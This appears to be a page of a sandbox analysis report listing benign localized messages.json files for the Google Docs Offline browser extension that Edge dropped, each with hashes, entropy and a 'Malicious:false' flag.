MD5:A1744B0F53CCF889955B95108367F9C8
SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:false
Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2766
Entropy (8bit):3.839730779948262
Encrypted:false
SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:97F769F51B83D35C260D1F8CFD7990AF
SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):978
                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):907
                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):914
                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):937
                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):934
                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):963
                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):884
                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):980
                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                Malicious:false
